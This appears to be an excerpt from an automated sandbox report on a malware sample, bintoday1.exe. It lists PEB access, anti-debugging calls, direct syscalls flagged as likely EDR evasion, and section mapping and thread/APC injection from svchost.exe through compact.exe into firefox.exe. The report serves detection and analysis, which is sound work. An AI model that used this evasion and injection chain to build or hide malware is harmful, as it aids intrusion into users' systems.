Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BCBF0 mov eax, dword ptr fs:[00000030h]	2_2_030BCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BCA11 mov eax, dword ptr fs:[00000030h]	2_2_030BCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA24 mov eax, dword ptr fs:[00000030h]	2_2_0306CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EA2E mov eax, dword ptr fs:[00000030h]	2_2_0305EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]	2_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03054A35 mov eax, dword ptr fs:[00000030h]	2_2_03054A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA38 mov eax, dword ptr fs:[00000030h]	2_2_0306CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03036A50 mov eax, dword ptr fs:[00000030h]	2_2_03036A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]	2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03040A5B mov eax, dword ptr fs:[00000030h]	2_2_03040A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CA6F mov eax, dword ptr fs:[00000030h]	2_2_0306CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030DEA60 mov eax, dword ptr fs:[00000030h]	2_2_030DEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]	2_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030ACA72 mov eax, dword ptr fs:[00000030h]	2_2_030ACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303EA80 mov eax, dword ptr fs:[00000030h]	2_2_0303EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03104A80 mov eax, dword ptr fs:[00000030h]	2_2_03104A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03068A90 mov edx, dword ptr fs:[00000030h]	2_2_03068A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]	2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03038AA0 mov eax, dword ptr fs:[00000030h]	2_2_03038AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086AA4 mov eax, dword ptr fs:[00000030h]	2_2_03086AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03086ACC mov eax, dword ptr fs:[00000030h]	2_2_03086ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030AD0 mov eax, dword ptr fs:[00000030h]	2_2_03030AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]	2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03064AD0 mov eax, dword ptr fs:[00000030h]	2_2_03064AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]	2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306AAEE mov eax, dword ptr fs:[00000030h]	2_2_0306AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]	2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030AE908 mov eax, dword ptr fs:[00000030h]	2_2_030AE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC912 mov eax, dword ptr fs:[00000030h]	2_2_030BC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]	2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03028918 mov eax, dword ptr fs:[00000030h]	2_2_03028918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B892A mov eax, dword ptr fs:[00000030h]	2_2_030B892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C892B mov eax, dword ptr fs:[00000030h]	2_2_030C892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B0946 mov eax, dword ptr fs:[00000030h]	2_2_030B0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03056962 mov eax, dword ptr fs:[00000030h]	2_2_03056962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov edx, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0307096E mov eax, dword ptr fs:[00000030h]	2_2_0307096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]	2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D4978 mov eax, dword ptr fs:[00000030h]	2_2_030D4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC97C mov eax, dword ptr fs:[00000030h]	2_2_030BC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030429A0 mov eax, dword ptr fs:[00000030h]	2_2_030429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]	2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030309AD mov eax, dword ptr fs:[00000030h]	2_2_030309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov esi, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B89B3 mov eax, dword ptr fs:[00000030h]	2_2_030B89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C69C0 mov eax, dword ptr fs:[00000030h]	2_2_030C69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0303A9D0 mov eax, dword ptr fs:[00000030h]	2_2_0303A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030649D0 mov eax, dword ptr fs:[00000030h]	2_2_030649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA9D3 mov eax, dword ptr fs:[00000030h]	2_2_030FA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE9E0 mov eax, dword ptr fs:[00000030h]	2_2_030BE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]	2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030629F9 mov eax, dword ptr fs:[00000030h]	2_2_030629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC810 mov eax, dword ptr fs:[00000030h]	2_2_030BC810
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov ecx, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03052835 mov eax, dword ptr fs:[00000030h]	2_2_03052835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306A830 mov eax, dword ptr fs:[00000030h]	2_2_0306A830
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]	2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030D483A mov eax, dword ptr fs:[00000030h]	2_2_030D483A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03042840 mov ecx, dword ptr fs:[00000030h]	2_2_03042840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03060854 mov eax, dword ptr fs:[00000030h]	2_2_03060854
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]	2_2_03034859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03034859 mov eax, dword ptr fs:[00000030h]	2_2_03034859
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]	2_2_030BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BE872 mov eax, dword ptr fs:[00000030h]	2_2_030BE872
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]	2_2_030C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030C6870 mov eax, dword ptr fs:[00000030h]	2_2_030C6870
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03030887 mov eax, dword ptr fs:[00000030h]	2_2_03030887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030BC89D mov eax, dword ptr fs:[00000030h]	2_2_030BC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305E8C0 mov eax, dword ptr fs:[00000030h]	2_2_0305E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030FA8E4 mov eax, dword ptr fs:[00000030h]	2_2_030FA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0306C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306C8F9 mov eax, dword ptr fs:[00000030h]	2_2_0306C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030E6F00 mov eax, dword ptr fs:[00000030h]	2_2_030E6F00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03032F12 mov eax, dword ptr fs:[00000030h]	2_2_03032F12
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0306CF1F mov eax, dword ptr fs:[00000030h]	2_2_0306CF1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0305EF28 mov eax, dword ptr fs:[00000030h]	2_2_0305EF28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_030B4F40 mov eax, dword ptr fs:[00000030h]	2_2_030B4F40

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00BF0B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00BF0B62

Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BC2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BC2622
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BB083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00BB083F
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BB09D5 SetUnhandledExceptionFilter,	0_2_00BB09D5
Source: C:\Users\user\Desktop\bintoday1.exe	Code function: 0_2_00BB0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00BB0C21

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtProtectVirtualMemory: Direct from: 0x77382F9C	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtSetInformationThread: Direct from: 0x773763F9	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtCreateMutant: Direct from: 0x773835CC	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtNotifyChangeKey: Direct from: 0x77383C2C	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtSetInformationProcess: Direct from: 0x77382C5C	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtCreateUserProcess: Direct from: 0x7738371C	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtQueryInformationProcess: Direct from: 0x77382C26	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtResumeThread: Direct from: 0x77382FBC	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtWriteVirtualMemory: Direct from: 0x7738490C	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtAllocateVirtualMemory: Direct from: 0x77383C9C	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtReadFile: Direct from: 0x77382ADC	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtAllocateVirtualMemory: Direct from: 0x77382BFC	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtDelayExecution: Direct from: 0x77382DDC	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtQuerySystemInformation: Direct from: 0x77382DFC	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtOpenSection: Direct from: 0x77382E0C	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtQueryVolumeInformationFile: Direct from: 0x77382F2C	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtQuerySystemInformation: Direct from: 0x773848CC	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtReadVirtualMemory: Direct from: 0x77382E8C	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtCreateKey: Direct from: 0x77382C6C	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtClose: Direct from: 0x77382B6C
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtAllocateVirtualMemory: Direct from: 0x773848EC	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtQueryAttributesFile: Direct from: 0x77382E6C	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtSetInformationThread: Direct from: 0x77382B4C	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtTerminateThread: Direct from: 0x77382FCC	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtQueryInformationToken: Direct from: 0x77382CAC	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtOpenKeyEx: Direct from: 0x77382B9C	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtAllocateVirtualMemory: Direct from: 0x77382BEC	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtDeviceIoControlFile: Direct from: 0x77382AEC	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtCreateFile: Direct from: 0x77382FEC	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtOpenFile: Direct from: 0x77382DCC	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	NtClose: Direct from: 0x77377B2E

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\bintoday1.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\compact.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\compact.exe

Thread register set: target process: 6468

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\compact.exe

Thread APC queued: target process: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\bintoday1.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 363008

Jump to behavior

Source: C:\Users\user\Desktop\bintoday1.exe

0_2_00BF1201

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00BD2BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00BD2BA5

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00BFB226 SendInput,keybd_event,

0_2_00BFB226

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00C122DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_00C122DA

Source: C:\Users\user\Desktop\bintoday1.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\bintoday1.exe"	Jump to behavior
Source: C:\Program Files (x86)\mnQwjkyJEUPSWQClPaPDwndGaluejhBJMukNqAUnUoxWZbdPMWwmZABFWlWhdCZEN\eypfpUNFpbLX.exe	Process created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\compact.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\bintoday1.exe

0_2_00BF0B62

Source: C:\Users\user\Desktop\bintoday1.exe

Code function: 0_2_00BF1663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00BF1663

Source: bintoday1.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
